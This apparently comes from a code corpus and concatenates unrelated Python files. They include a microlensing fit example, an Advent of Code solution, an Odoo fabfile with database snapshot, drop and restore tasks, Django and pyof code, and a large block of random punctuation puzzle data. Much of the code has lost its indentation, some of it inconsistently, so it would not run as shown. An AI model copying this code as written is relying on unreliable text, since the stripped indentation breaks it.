best = samples[best_index, :]
print("\nSmallest chi2 model:")
print(*[repr(b) if isinstance(b, float) else b.value for b in best])
print(best_chi2)
for (i, parameter) in enumerate(parameters):
setattr(my_event.model.parameters, parameter, best[i])
my_event.fit_fluxes()
# Plot results.
ln_like(best, my_event, parameters, False) # This allows plotting of
# the best model.
print(my_event.model)
my_event.plot_data(subtract_2450000=True)
my_event.plot_model(
subtract_2450000=True,
t_start=other_settings['plot_time'][0]+2450000.,
t_stop=other_settings['plot_time'][1]+2450000.)
plt.xlim(*other_settings['plot_time'])
plt.show()
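# Example invocation (the config file is one of those named in the module
# docstring and is assumed to sit next to this script):
#     python example_15_fitting.py example_15_ob05390_v1.cfg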
|
rpoleski/MulensModel
|
examples/example_15_fitting.py
|
Python
|
mit
| 5,757
|
#!/usr/bin/env python
sx=0
sy=0
rx=0
ry=0
total = 2
houses = set()
houses.add( (0,0) ) # starting point
with open("../input/03.txt") as fileobj:
for word in fileobj:
        for ch in word:
            if ch not in '^v<>': # ignore newlines and any stray characters
                continue
            total+=1
if total % 2 == 0: # santa
if ch == '^':
sx+=1
if ch == 'v':
sx-=1
if ch == '<':
sy-=1
if ch == '>':
sy+=1
houses.add( (sx,sy) )
else: # robo-santa
if ch == '^':
rx+=1
if ch == 'v':
rx-=1
if ch == '<':
ry-=1
if ch == '>':
ry+=1
houses.add( (rx,ry) )
print "total presents: %s" % total
print "total houses visited: %s" % len(houses)
|
dsumike/adventofcode
|
python/03p2.py
|
Python
|
mit
| 628
|
import os
import sys
import glob
import datetime
import erppeek
import xmlrpclib
from fabric.api import task, hosts
from fabric.api import local, env, prompt, execute, lcd, run, put
from fabric.context_managers import quiet
from fabric import colors
# see: http://fabric.readthedocs.org/en/1.8/usage/execution.html#leveraging-native-ssh-config-files
env.use_ssh_config = True
env.TS = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
env.odoo_database = os.environ.get("ODOO_DATABASE", "wochenbericht")
env.odoo_admin_user = os.environ.get("ODOO_ADMIN_USER", "admin")
env.odoo_admin_pw = os.environ.get("ODOO_ADMIN_PASS", "12345")
env.odoo_modules = ["wochenbericht"]
env.odoo_location = os.path.expanduser("~/develop/nexiles/odoo")
env.odoo_snapshot = "sql/{odoo_database}-snapshot-{TS}.dump".format(**env)
def get_last_snapshot():
    # Try to get the latest snapshot.  glob() returns files in arbitrary order,
    # so sort by name -- the timestamp suffix makes that order chronological.
    snapshots = sorted(glob.glob("sql/{odoo_database}-snapshot*.dump".format(**env)))
    if snapshots:
        env.latest_snapshot = snapshots[-1]
def set_database_name(database):
if hasattr(set_database_name, "firstrun"):
print colors.yellow("Setting database: {}".format(database))
set_database_name.firstrun = True
env.odoo_database = database
env.odoo_snapshot = "sql/{odoo_database}-snapshot-{TS}.dump".format(**env)
get_last_snapshot()
def get_odoo_client():
return erppeek.Client("http://localhost:8069", db=env.odoo_database, user=env.odoo_admin_user, password=env.odoo_admin_pw)
set_database_name(env.odoo_database)
if not os.path.exists(os.path.join(env.odoo_location, "odoo.py")):
print colors.red("No odoo checkout found in {odoo_location} -- abort".format(**env))
sys.exit(10)
######################################################################
# Building
@task
def build():
"""Build module"""
# nothing fancy for now
with lcd("docs"):
local("make html")
local("rst2html.py docs/changelog.rst > src/nexiles_odoo/static/description/index.html")
######################################################################
# Development tasks
@task(alias="start")
def start_odoo(database=None, update=None):
"""Fire up odoo"""
if database:
set_database_name(database)
if not update:
local("{odoo_location}/odoo.py --addons-path ./addons,{odoo_location}/addons --database {odoo_database} --logfile=odoo.log".format(**env))
else:
print colors.red("Updating modules: {}".format(update))
local("{odoo_location}/odoo.py --addons-path ./addons,{odoo_location}/addons --database {odoo_database} --update {update} --logfile=odoo.log".format(update=update, **env))
@task
def replay(database=None, update=None):
"""Instant Replay -- restore to last snapshot and startup odoo."""
if database:
env.odoo_database = database
get_last_snapshot()
execute(restore)
execute(start_odoo, database, update)
@task
def snapshot(database=None):
"""Snapshot database"""
if database:
set_database_name(database)
# NOTE:
    # The -x and -O flags skip privileges (GRANT/REVOKE) and ownership in the dump.
    # This is probably a bad idea in production ...
local("pg_dump -x -O -Fc -f {odoo_snapshot} {odoo_database}".format(**env))
@task
def restore(database=None):
"""Restore to newest snapshot"""
if database:
set_database_name(database)
if "latest_snapshot" not in env:
print colors.red("No snapshot found -- abort.")
return
print colors.yellow("I'm going to drop the database {odoo_database} and restore from {latest_snapshot}.".format(**env))
prompt(colors.red("press enter to continue"))
local("dropdb {odoo_database}".format(**env))
local("createdb -T template0 {odoo_database}".format(**env))
local("pg_restore -O -d {odoo_database} {latest_snapshot}".format(**env))
@task(alias="update")
def update_modules(database=None, modules=None):
"""Update modules. Requires running odoo."""
if database is not None:
set_database_name(database)
if modules is not None:
env.odoo_modules = modules.split(":")
client = get_odoo_client()
try:
client.upgrade(*env.odoo_modules)
except xmlrpclib.Fault, e:
print colors.red("XMLRPC ERROR")
print colors.yellow(e.faultCode)
print colors.yellow(e.faultString)
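# Typical command lines (Fabric 1.x "task:arg,kw=value" syntax; the database
# name below is just this project's default, not a requirement):
#     fab snapshot:wochenbericht
#     fab restore
#     fab start:database=wochenbericht,update=wochenbericht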
# EOF
|
nexiles/odoo.wochenbericht
|
fabfile.py
|
Python
|
mit
| 4,380
|
# -*- coding: utf-8 -*-
from datetime import datetime
from django.contrib.auth.models import User
from django.core.cache import cache
from useractivity.utils import get_online_users
def online_users(request):
"""Returns context variable with a set of users online."""
if request.user.is_authenticated():
return {"ONLINE_USERS": get_online_users()}
return {}
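# To activate this context processor its dotted path has to be listed in the
# project settings; for this app layout that would presumably be
# "useractivity.context_processors.online_users" inside
# TEMPLATE_CONTEXT_PROCESSORS (the pre-Django-1.8 setting name).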
|
turian/django-instantmessage
|
pinax-im-dist/apps/useractivity/context_processors.py
|
Python
|
mit
| 380
|
"""Test of v0x04 queue module."""
from pyof.v0x04.common.queue import (
PacketQueue, QueuePropExperimenter, QueuePropHeader, QueuePropMaxRate,
QueuePropMinRate)
from tests.unit.test_struct import TestStruct
class TestPacketQueue(TestStruct):
"""Packet Queue structure tests (also those in :class:`.TestDump`)."""
@classmethod
def setUpClass(cls):
"""Configure raw file and its object in parent class (TestDump)."""
super().setUpClass()
super().set_raw_dump_file('v0x04', 'packet_queue')
super().set_raw_dump_object(PacketQueue)
super().set_minimum_size(16)
class TestQueuePropExperimenter(TestStruct):
"""QueuePropExperimenter tests (also those in :class:`.TestDump`)."""
@classmethod
def setUpClass(cls):
"""Configure raw file and its object in parent class (TestDump)."""
super().setUpClass()
super().set_raw_dump_file('v0x04', 'queue_prop_experimenter')
super().set_raw_dump_object(QueuePropExperimenter)
super().set_minimum_size(16)
class TestQueuePropHeader(TestStruct):
"""QueuePropHeader structure tests (also those in :class:`.TestDump`)."""
@classmethod
def setUpClass(cls):
"""Configure raw file and its object in parent class (TestDump)."""
super().setUpClass()
super().set_raw_dump_file('v0x04', 'queue_prop_header')
super().set_raw_dump_object(QueuePropHeader)
super().set_minimum_size(8)
class TestQueuePropMaxRate(TestStruct):
"""QueuePropMaxRate structure tests (also those in :class:`.TestDump`)."""
@classmethod
def setUpClass(cls):
"""Configure raw file and its object in parent class (TestDump)."""
super().setUpClass()
super().set_raw_dump_file('v0x04', 'queue_prop_max_rate')
super().set_raw_dump_object(QueuePropMaxRate)
super().set_minimum_size(16)
class TestQueuePropMinRate(TestStruct):
"""QueuePropMinRate structure tests (also those in :class:`.TestDump`)."""
@classmethod
def setUpClass(cls):
"""Configure raw file and its object in parent class (TestDump)."""
super().setUpClass()
super().set_raw_dump_file('v0x04', 'queue_prop_min_rate')
super().set_raw_dump_object(QueuePropMinRate)
super().set_minimum_size(16)
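# Running only this module with the standard-library runner (the dotted path
# mirrors the file location; the project may use its own test runner instead):
#     python -m unittest tests.unit.v0x04.test_common.test_queue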
|
kytos/python-openflow
|
tests/unit/v0x04/test_common/test_queue.py
|
Python
|
mit
| 2,327
|
# -*- coding: utf-8 -*-
# Copyright 2016 Christoph Reiter
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
import os
import sys
import time
import senf
def main(argv):
dir_ = argv[1]
for entry in sorted(os.listdir(dir_)):
path = os.path.join(dir_, entry)
size = os.path.getsize(path)
mtime = os.path.getmtime(path)
mtime_format = time.strftime("%b %d %H:%M", time.localtime(mtime))
reset = '\033[0m'
if os.path.isdir(path):
color = '\033[1;94m'
elif os.access(path, os.X_OK):
color = '\033[1;92m'
else:
color = ''
if not senf.supports_ansi_escape_codes(sys.stdout.fileno()):
reset = color = ''
senf.print_("%6d %13s %s%s%s" % (size, mtime_format, color,
entry, reset))
if __name__ == "__main__":
main(senf.argv)
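# Example usage (any readable directory works; "." is only an illustration):
#     python ls.py .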
|
quodlibet/senf
|
examples/ls.py
|
Python
|
mit
| 1,435
|
mess = """
[... several hundred lines of dense, obfuscated punctuation omitted; this final
corpus entry is truncated here, before the closing triple-quote ...]
@*{*&_&({{[@{]*&![]*_}&#!+@#+&&_(+#*[+{^%@_+*+}}^@*(]#{*$++)_@@]%_}!$%+]+$&^!$@$
[}^_#[({^+_%{*@}@_[]{+][_*!#{])_^_@$(@%!@!(]%))){%](#]]#}@&}+%[@&[[)%#%{{+@[(^@+
{)}{%(&+]^}^+!$!^*_*+^@*}+]#}_#^(%#$]({+{#(+@$][%$#(_[$@]@+@[@]@%]@}[[@(*^@($#_(
*)[&_{{(!*+%(_&*}@#[%[()@}]}[#&{)*}&(}]&{%][_%$@&_%*)&_^]{##]${_(*%*{!_+)^]][_&+
]{_{()%(_&@}@}[%+#^@}#**!}+$@]@+*($*}#_{)!+])#$[@%]&])*%___!*${++&%^$^#@&_{)#[$+
$+]@#@_^^_#@}!)$_#$*&{+^{+@*{#!#$!%*^!}[[{]+{[@(%_&}^$%^()[&#%@_+{(*[$#!}[+_{*%(
_+&}__!_#^&(%!&^%)(@)^!^)$([_[_{_$!){*[!*&#+((%(@#)!%!_[!#[_]%[#]}}%[$)+#@%%*[%+
^!*[([#&${}^%@{[&!!$}!&#![_&[^&_{@#))+&%$!!{([@[}*({$]&}}@&**[++!_*^^[{^(!*^^%][
_[^])_{}!*^^]@@%*(@_])[&&$[}%@$$##]&#)+!#_%@}#(%&++&){#!+!&]!{&$&})[]}$*(&&)@#[$
%^^(}^#&@!_#*%)^}{&&*]+(^{({+$^]()@[)&&[&[##[][%]*&!_}&[}{{[$@}+!{[$[^++}]}[#[^#
^!%!+}(^*^%#@}{@_[#^@)(+)#%^)+@!{}_}{(!$[[+_[%@}!){{]]$]!^[@)(}&#([((%$#&%*]#!&^
!%$+}+&[[{[![!{(_@_(^^#]+!&%([_[*}^}}%!^&^&#)&#[)*@$+$%(@+*][}}(#@%!++^_!*[+#%&_
(@@)]#)#{}@&#{{&@_^&$+$@**{(][&]#{@+{#*$_)#_!&{#]%#(%!*()+)%#&{!+*^[[[{*))$!*__}
)[%%]&_[{]{^[#)*)+#*}}(($)*(*{${}{}#[&}[![%!]%}^{&}&$[(%}^*_[)]+{!&+)[@*&&{@&%#[
!*___^_&]]#&[](*+}(^]%+^^)*}]{$!({%+_*]#&{+&)]&}}]}^+[)#_&_+&!&{[{_)]%{+&{*}*%[+
]#%{_[){!)}_#]}!#%{#][_+]}^$}))#{@{+#(!_]$[!!&{{&+}!!)@)&)}]^^@^((]&^!+!]$}${#$*
}]*_&%_]{^(_&$@&_({#!(_]@#%+{##_+*+^]!#]_]#](]${]][_]]%_{$*}[&^{!_)##%%)+)*&*__!
}&*_*]&*#(]]@[%{%]#{]+_(}^(}*!#&]^[!*]&^$+!_^_++%+##(*@+(^#}#&*[{*])#)]$*%*+](+[
[{+&${}%!){!_%&&]*!!({$#)&}+[)(!}@&!^][)[#)}@_$*)^%${]][^]$!_$$#*&&#!{!!*+_##^#!
[#&##(}+[@!{_+}%]&$((@$*(#{]@&(]&^)%#^^^[)()+*^{]%#%][[*{%@_))}@])%#*!)#_(}(&&}$
_&&@%)%#(^}&]_(_%@]}^$]_#@^]+{^#^*&&@!^$]$*#}$(!])#)_@]@[@^+}#&_*#^(_%${%(}]+&}!
{&_}}{*){)_*^_[!)$]^%%]&]_*]&*_@}]_{+@!!$@(]$))!+#)*!](@[@*&!+%}@$+@*@_(_!)_[]}!
)[^!^^^!$^$^_*#}#&{{}*}}[$#!$#(&_(_}^+]@#{]}_^]^}{&_[)[&_##_#*$[_]&}$_&]()+&$_{]
+$_{#_]%}[+)$++$}[(*!+[$]*}!$${@#@{^{{#}[!%!#$&^^[+[+^(%}(^]#+!)(@{$&}#{*)#$(&{$
($^*%*#+$%{*&]@(*_+&{*_]}%(!{)*([+()(@[}&!+{$!+%{^{{}]!(]}!)**__*]$^()@$&*+})_!+
%@_)%@([#{@$({[^*(${(}#*@[))+[^!([#]{$*^[)_^}*{$#&$$%+!%}($$!{+[$}&#^$&!^@^@{!**
&*}]@#)#&*&%&{#^((({%}$*^*!__*$_!%^{_!^$*]#*_{!(*){$}^${%@$$$_}%!)*(^}+)@}$)&+(_
#([]_)&_*^_^*($$+&[$!}&[[@{])[%*_$+%])[(!+)#@(()!+^{)})%@&&^@]}#^@]$]+)])&^_]_]#
$&_*))[*[{%_##^#(*[$$&!$^#^*++$**}){[*+%))!!+%(#}@)[$$$&$+{+%&+&[{]^{!_)%(*)}#[(
$@[_)([@}_%&%)@{*)]^%*^!!!%]{}!([#!^^[+!^$+}^&{}*(+]{![!)$$&{!{{[^#$){+)(&^{)_{!
{{!%}&&%#}!]!_&%@@_])((}}(@^]*+})}{*{@[$[&%(]%!_[(}%+)((*(}]&#*_$[^#[![_)%_+((@}
!&(_&^+[(!#+{@#[[%[_)_*]%+)!@[(%#&^+{#$)$]]![(@+@(]*%#{@#$&#&*&!#_)*[@*+++{+}@](
#]#()_)#^}&%#(^$&(}^#]!$]^+*$*]*%])&@}$!{^_&+$]&{}{*^$_(]]%##%)!#^(@&)](](]}]_@#
%+]^+%&%([^)!#_+^]%++#+!({*)^@#)(_&^$*(_$](@[{@_++_%@_#][(&$&#}%@##}*!_[[+@@!&}*
$@^*)(*^!$%$[)}${))&^*+&_#*[{))(*_##&*_$+^&^!#![@@$[@#!&&)_+#%)&@(!!^$$!^!(_{%!(
{^$[[#[@@(]}{!+)[($%({@#%[}}+#^]#{%#^#*]#{)&__&@%+)@@}_!*_#&]{])&_#)){%!&]%##++[
({+{_#[}}#%!&&*#{[##][]*@_&#*+!)]__#^+_!^*_}#+}}((!+]]++]%_]*){]%_}]]&%{_%]^)!})
[@*!*!@_[]__{**[}*{{+]@&[@*!&]^_{[($]}^[}%!!(@+[]$)#!}${*#&}}#*^%&!{*#$}){+!{!@#
]*$]@(*$}[!@{($*&+[_[_*+*@@%_]*$[*%#{%![]!_@}!_{#)]!*@+[*%&[{^_]!%#+!}]%*#%[@{}$
^[[})(&&_%#[}+%]{{*%](*^[%])(_$]+[[&^$+{&]*$}]%$#(_$!&##}$%&@[[{)@#&+&(&@!+)@@+[
@}$][([]*]&&%__*{*++!($#@$*+]^&!%)!)*@]$#]*@#*!^%+#(!^#{{#*(][)([&!@!*%^*(#{&{{[
{}*_#+*%(}*(%$^^&$[_)[*)%)_(^&&!&&%$(([**+)_)$[!]%{$[({[$$!}_(]^_%{^[%$*@^_!!&))
]_(_#!}]&&{]{*]]%{@{+$&!@&!_{!&!#]_(!%@[{)(&&[#)#$#{[!^{_*]%[^+%{^*+#[!%*#[(@^#(
#{*#&+_{]@^#[[^_!+*}]!^$#$#)#[$!})%}#^#%%%@_+$((]^*#^&^)[]$[]!{^$%&*%&!^^!(+$#$&
$(+({[({@&{^)+@]]$_(%_&^%_&%!^(]_!{*@*+[#}}[}{@&&#(}@#^[^{(@_})_*!+{*]_(&+]#)*[@
{{$@)&&{&%%*@&_++)$[_}^&@$%@_[^]_}^&#^]#&^[%#*[!}!&}@##!@
[@+[_#[({*%)&{*^%]+[_+%(&[(%!@&$_*}_+^)+(}))+%]))[#($^!]+^$%}([}!%#%&!&}^)@(_{[@
+@)^#)]$#&!+_]_@]${^^)[+$[[)*%{!({&#@+@!*!&*&_&!*!*@}#&%]%!]&%^@&#_$%}++[%(*$&%(
$(()%}]#!])+#[]({{*!$&(@&#}[}#[]#[(![#{*})@^]*!})#*+}@}^}^%]^!}}#({[&!^(%}]}{$*}
*@^{*@^[&}])(!%&(_%*&}{*$}^@#]*^%&^$__$)(![@$)@]+*!+__{#*_^}%@)_$]]#@{$__%*#!_*+
])[%][!]({#+&@{}}{)()[#{_{_%_+&^{[!#$$]&_(]+@{)#&^+${]!@&][}%(]&!*(*@!)@]__![*+#
}+%&((]+&#^!$+__@*+(&#])!^!%]$^#_)[+]+*&@+@{%{[{_@]([!_@_&{{$[*%]}#[!&@%}(%#{_}&
*}&{)_[*[_*%[$_(@]!@#}${^#+)^$]@^{#]^_%&@%(})@!{{!_%@#(@(_@{^#[!^**)!*&](![[![&_
{#%!#$}#*!$+&)}$%*_&&#}+]{__@!!^%@[+]%[#!*!]@{_%+#{))&#@+}}[%&(@@(]((*@@!}]}{#!^
+_}][^[^#}]+][+%]$__*&&+]!+$[+(@$__&#+)}@[*{+(%*)&@#)+*+!}&&_$+[#$[*_#%@{((&[$%$
}+$#&+}!^([^!](!%&)#!_^!#$*)[[{}#[_(@@^#+$)(}_$]^&[+#+})[#]%)(}!}+!}##_$$&#@^*]]
$%^))}#($]$_*%%+*${!_(){@_^(*[_^{]{()]){^&#@_&@{!)!&)}]%{$*^(&#]}*])&{&[+[^_*+@[
]%^[^_%%{]!!$([^!*##^)^%%&@[{#+%)[)!#&[]@[{]+!##@_)%&[#@(+)#&&)_[%[#[*(}&#_@[[$)
%^%{[{{}+&{*]*_[*$[%[)_{!*&*+@)_@@_!+*(#!}_[(!]@@*{#&#(_{]@&$[[&&(#^{)++}#(#&{+(
()#](()]]_&)!}(][@_%{)*+^$[((){(#)(_#%+%!%}))}%@)#*}_)#$&}(*@][@}+##%+}}_[[%(!&@
&)&@#[$^*^^#*&)#!#{_][@#*^}$&!#!][$+@{)}^^^(*^}$%[&(@^#$*!}*$&^)!_[]]}@[+#)**@&]
@[}{_[@$}**_%+]${[&*#[^!#]*[(*$)@]*[*}*&_{%(@)]%%$]({]@&%]&_)%_#%)#**{&*(%&!*+_}
[^]^_*#[!^+#$!_{[}&&])#$_@!#]&_{{[[+*()#{*}&#(+}}_@@(@&^+$@&}*!^!_*[%](%[$)_[]&_
+(&$@})+{{_}[&*_!*^^!!+!{((({[[$^^%!_&[][!%]}^&{&&]_}$@$}[(_{_&{#$@$@!#[)}_{($}&
&@#+(((&%+$&$!!*^}{+}%&^{&&!_]+}}][!%[$){)_[+(&+{)$(+(+*#%{%&+(+}+*%%}_]&+&[^_[#
)_+#}!#@$){+}##+}+*%}@}[#!!@_)@&%*{_!{{#!!##]{}{#+_}]+({]^}@{]$_@*^+{_{^]@**+)[^
[%&[[&+{}%@}}*]##]}%#[_+{)!*_)[[^#!(+$+(_!})]()#)}*!)_{^#[@!#]]^()_@]^]$@!+_$!(^
&{[([}&!]{_%%$+}+!%!({_]&+@]@[@^*)_+_(%#}*#_#%[#*+(!)}]^$)%**}]@&]%++#})[_((@[}(
$(]!]$@&!+]{#]*_{)(@(^]*[+[]@*#{&#+%%&(@!@{)(#[]]%[!+(&!&@)&{^++&}*_*_#{(_&[(}{!
}&#(({#%$^(()^}^^{$][)+![}%}[!()@%_^][)@+]+@!!%+^#@++$%(@*$]^*{]!+###)^#&@[^[(#}
)+{!}(_@#@)([$^{$@*$)^{#!]_)_&]{}+(^]}*[(**]))@)$+]*+[_]@&&({#(}[_*+%){$&^}}(*[_
*^!_+^_#(_*}))#{#$)[^$*(_+}[#+_@^#{+){${]*)[]]}((_*%_^+&(&]}!!!)@(++{)%&#}*[^+$^
]^&]}&&@}#*#@%**[]${%!}*](([![@^}^![^+@%[^$*&#)}*}^_%_]%{[_*_#}!_!$({^&[(@#)$$$@
$@_$*@_{(_{$$$%_%}(}]+(}){}]]&$+*][)%]^@&#]]&}+%}**!+%*${^)^{%)&%%&#]}&%+^_@_^#]
{@*&!$&]%{[_(^$}(({]^!#[)@@[[{*]{)_}]#*}$#_((#*+^]&]}]@^#^%^^[*@$}&{{&#*[_{]%#**
}[%(^{_&!++[_)+@&^])&)+!(@%+([![$*$+&_)&_*#%!#]${[}_)+)&$#^*##_&}$]]++!#+(@#!#[}
)[+)]+{@*)&(^{^!+^^]!^)[$_!{&{+]{@&#!_)#%_[@@_[#%*%)*])$}%{++%[)&^[+!#))#(+_+$${
#})(%&!!!${($[$&[]+)^}_$$[%}^[^%!)$#%!}[@}%%*_^[+!{!_!!@^{{_]%}#+{}{{$+#}]%[{*}_
+#@[(+!%]*#]{#$%[]+[*[#_+(^]{}#(!!{]&!}}#{#&{)!(]%*#*$(@}!^]+{!(&+%**#@@$](%#[!+
!!)&!]!+^$(}(@{#@${]{^&$^)[!*[@#]*{%)+^}@)(%$$*{{+@!!@{@{}@+@!*&{%]_@^)*$+&&@+)*
^}{&*{*}_$%&((#&}%($*%]#+!*)@{$@#^+}([[*%)+%$@]}@]%({(]$$__+!}}+@@!${%(])+{}![@{
{_]+[&&@%%(#{(^%)++%)!&!)+&)&]&}[&[^*!${&!#&&*^)[&$]!]%@{%%!&@@+}{#*]+%&!#^_]!_@
@}_%^^[+{_*[]%!@(#]*%}{+@_}*{[%^@_#{@}}[%[@+]@_()$)[[*!)(#)$%$%(^[^++_++@})$[&+(
%^^%#{!)#*{[+!(!_}[!}_)&$#&]$%##))#&%!+^#}()+@{^^@)^)}]^{]+[]+[[_(]+}*+_*+]$%)&(
[)%&$}&!{+&}]{@%]@#_[]({+]@%@&]@}))!@({$]*!)])[!@(&%++(}[[$%!![$*&^+}]][)!)_^*&#
%[+#}(&!&^_*]$^${[^_)_%!}%*{@$]^}}!_$%*%_$#_({+${_]*_$[)[^{%^@@[##&{)]%]%*%)&_#^
&@(^}(){)&$[#[##%]*^@*{&(]$$](+%(^}@!&)]@##!&@!^)![#@%[&+@%^&@^{_&%&[(^(}+&[(&%}
(%+{*{)]^+[{*+&+_)^)$)[]{}]&}%((_%%[_#}[}*%[^_@!$%)*^@]@%+[#$}##&!_}[%[![*^}_)+#
_*+@[!(^)&++[+&_^%(_@]_@!^&{]+*+&@(&{@@&{##@)_*#{)^[%+%]@^$%@([#)[+@[_]+#}!#+!&]
@[(&+_{@#^&{$$[#]&@!$#$%$%(((_)!)]]*}(@*^$)!!+%_!!^__@@}[*^)%@**@!@}&!{&%+!#!(^@
@{^#*)+$!@$&([++@$@_##+%}_[{}_#{@!@@#$(@&]^]*%!+$)(+{[+^%^{+!}!&$[&#@}_&{%![^#*+
#]@(&}]!@[}+_]!{]%+&)^{[@[__}}$$&!]#)_!(**@(+*!^}+#)}!)@$^![^){!#$[*{%&![!^^^_{[
*[*#_*&%)&)}@%!@!&#]+%^#))#_#(#]*#*!@^{()&}[{%(&[^)@$^%(}&#@(%+@%{%%]*{$(@%$]*$]
}(}@$(!!^]+)%($)_[!@%#{[@#((%+]*!*)%([]{(}*$]%#^*#_@@}+_*{$+(%]}$@{!#*%*[[^!{)&#
#*!#^*+[_!$^%&)%$_@%}[%}#{{}%!$)[%+[[&%)^(@(_^)!*@#^#@@+@[(@)$(^&_}%%)@{$%+){(+[
})#[)!!@))^@_!}(+{{(%#&[_}+_)_{#%%[%^(]]([(_!@$#$%*)$+(!_##}]_@+*!]&}@}$&@!#)%_#
#@+&(@[*_*})&&#@^]{(()!#^)]{+$&(}!%{!}([^^*}(])[@(($@^!^___)!}[{}*#%_${_&}{+[}{%
^$!%@{_]@%%+$]%[)]#_#**_(_*@!_(({(&&^$#]@+{&]]{$)]$)*}^+_($#$_*][@^%&$(_+}&]${(%
+_$!$^]#@}{+#@[]_%#^${]$(@$#[!^+&)%)+&#)&{}}@([&{+{_@}[++&!&}#$}^({])^&[)&)]_{%+
@+]_*^&+}^@%*+))}@!@#@{%$_&$%(@([!)))@(+]&$*^}$_+()*[(^(((+[@@#%)&$]{}{]*(@(@+^_
){*#@)))#)}#^)%&](%(_}[{&$#]#$@*[_[]_%+&%}+%#)!^[}[%$!_](^}]){)#^[#]_(%(!+[{^^%{
^[+))[]#@}$_)((+*_]_[^(_*$)&$($!#%&_#]_^))+%+]#{[{{@*}[#(#($&@}%@%#(*}}]#+^{{&%&
{}+_}}{%*]_#$@}({%)}%_!]@$[${+]@+&@!]&$$!%}]^!%_#%#)$#^+{+%&#+^()_%@%!&[!$&[###]
+[_++$%]&_#()&#{]&]_($$)$%]+^*$[]%{*^!(}%#([!%[@{**_)@##)_$({[#()@{]}%#*@$(!^%}&
$#[()}}%)@)*([(!$+*^__]!!+}&+$*^+}{^@]!)!*{[^&_^)%{!^##}[#$!+&}$[]&_]#_%$(@^{^)}
{]#%]_%#]@*[}&[$@_*_$@]{[_#)&!@@}+]}@{*%({({((!@{{*#&#+!)$}_!!^#{^^{&}[_!*}(_}(@
@@_@@%[)$)!&^^]{$@&{]+(#}+#{^#&*&__@*&&_&!{]+%+^!)*%!$}_()$#%^{)+@@^_]_$&_)(_*&)
}]!${+_[*)+#[#^^&))@^$%&^_!(^{}[])%$][&_!)])@%}+({}+]%#{$]@^{@_]%*#!_#!((+_(#_]+
[@**!)^[#^^%#*(!_{((&!*%!!+&+%)_{$}+^@[)[@]$_$*+&(&{)^%]}(()*){[{]@}[]]*%!#](*%@
))((])]*%%%$+(%}$+%#[#^%]^@)@^_^)#%#([*%*@+(+)&+++(^%]*!$_$$$%$+&]_+[@_}%&@@%){)
_^{^+!+%^)]!_&+}@+^$_]*#]((^&$#!_)}][&#$+&)]_*#{%%]}}[%*${&)]}((^(_}(](]})*]_&))
+}^_}$)@@+{([@%!@[_]]+%(%%%{(@[_#+@&^__+!^!_^@]@^#]]##%*^]!$$!+[#)^![@%++%$[&[)[
$$!^&!({]{)(@(%]%}{]]{%#{&!{*@&)%%&)#$+($[[[$+_#@!]%#)&&&+*^%*]#_@)[]]+++[]^}]%$
+&^^%({}}{])]!!}]**&!{[}+*$@*{$$_}(^+(^(!%@^+*+%$!}{((%$%}^{%@[^@]^{{%_(#$(&+]$*
_^[$$+!(_(!](!+^{}$]@[]$}*)]})_[#+%]@%&@*&{@&+)+({[^%^++)*#+*(+!}*%^})+++@}_&#&]
][*}^+[!@*+$[%%(*[_$+}$]*}]%$%@&]@)!@+]$(&]^_$!)@+%!+&(%]&[(#[#}_@%&_{{]^@#}&_(+
#$^#$&$_(@(()$(@+*)^{(})[#%}%$(@@[*&!]_+&%%^###]%[+)$[_+$%$$_]#&#*#$+@#)%&^#_}_}
_%[@{(*)${##{*@{[]&^[&%^[)%*[]*)$*@)[$%{{^#^(}!!_$!+*^&!)([!!]_%)([(#])+$*%[@{&^
^++{&{@%{({^&}@!^)@]%&@&_+#]]%%[]+%[^)@#+{+)&{*@+&&}_!_!!$$${#({{{#+))]*(&&@{{%&
@+}{%*%[$}(#)$]][)!_%{(!){@%_##%{$)&))_!^(!#([+)]#_*)_$#}!$$})%^[%(_+!&{+^*^()![
*@$}^)}{$^+%@@^)!){@*{#*[#*#)^{@!(&@#+_#^[&^$+&$!*!@&[}&&#&@^})&(%[*%!)@[@])*{%]
@!]@([@&%${{%*@^[*$#])__&+{@@@{$+[(@!%!^_{$*^*$)%$!%_]&$($!#&)@!}#&*#(#_*#]*#%{)
*@}(]+@#@&}}_}$+&^&[#%^*%*&(!!@{^^%$_{+[!@^](@*&%#!}**^$@{$#&!!!^)]%$_)%!&{^^}!%
(*$**!(@&*+)[+(!_(]![%!^[)[!@]_$*))+(+}[+%($%!+%!&^[(^^@(_]&#@[[^]]*@_{}(}[#_{*_
!+(_^]_%&&#$*}^*+!*^}][&_[}[@]$#{]%{)*[$!^_@(&$^!%$+]{#&@%{!)@&#^}%%^+@}}%%&^^}@
*##+)__()+]!]])#!%(&+{))&)@(][++_*[@@)%{[%[+{}^*(_&(&@#&^$@^_}%^{!!][+)$%&[&]@$*@^#^#%&}*@_))!^#})$!@%)(}&_^]!![+#()}%)
%@}}%^(#(})*}){+$_[+]%%]#(*[#_(![&{#*$){_%^}+*))&+)$#_*}[][@}_#%@{+(+[#}(]^%}^}+
_$#*(^]{&$#}{@_^^!(!++]@}${]{_)%#&{@^%$+{)]+_$&@[)#[!%^((@(}$([#$%!]&[&*&!#![^@+
{#@+}@^@([++{^%$^@@}}*{!$*&^&)$)$$$}[#[%!_]+]]*_)!!&[]}+$!}%+{!(&^!#{##}!}&@(])+
^(+{+_%%])}(*!*+@+^$*#})+&{}%)(@%[{#^+&@)_[(+[@@&{@){#({++_@(((*&&{@$&[[%($}^{(+
&*%}%((!&#!$[)_(}*@^%[@)]#%*}}]#!&*$&+[^{#+##(_%_^)]@^}*^]{[^^]!!+^+^$%#))^%}*^#
%#(*}&)[{_$+@}}&_]$&_{]$)]&[{**$^(#$][__{@_%#%&^)^%!#[]@$@$([!$+%@{(@)@*^}(+{)+(
_@$)^&@+})_^^]%*$^^}_]@(*&)+){(^)_#${%{$+#@))#)[)&$][(*&}}^]^_%!*#*]$@%}+$#^$[&(
%!*_*(%))^[*+__*{+[_)++))(#_%(+!@#+@^^&[)*_^_+_%([&)@#}!#%(!#!!}$[@]_@{)^[{%]*$%
@&*!$_#{!$_*_!{*()@]+_&%{#!$%^()$](^]&#@!$%))#]@*{@($#&(*&&@^%@{_({{*))+#)){$^+_
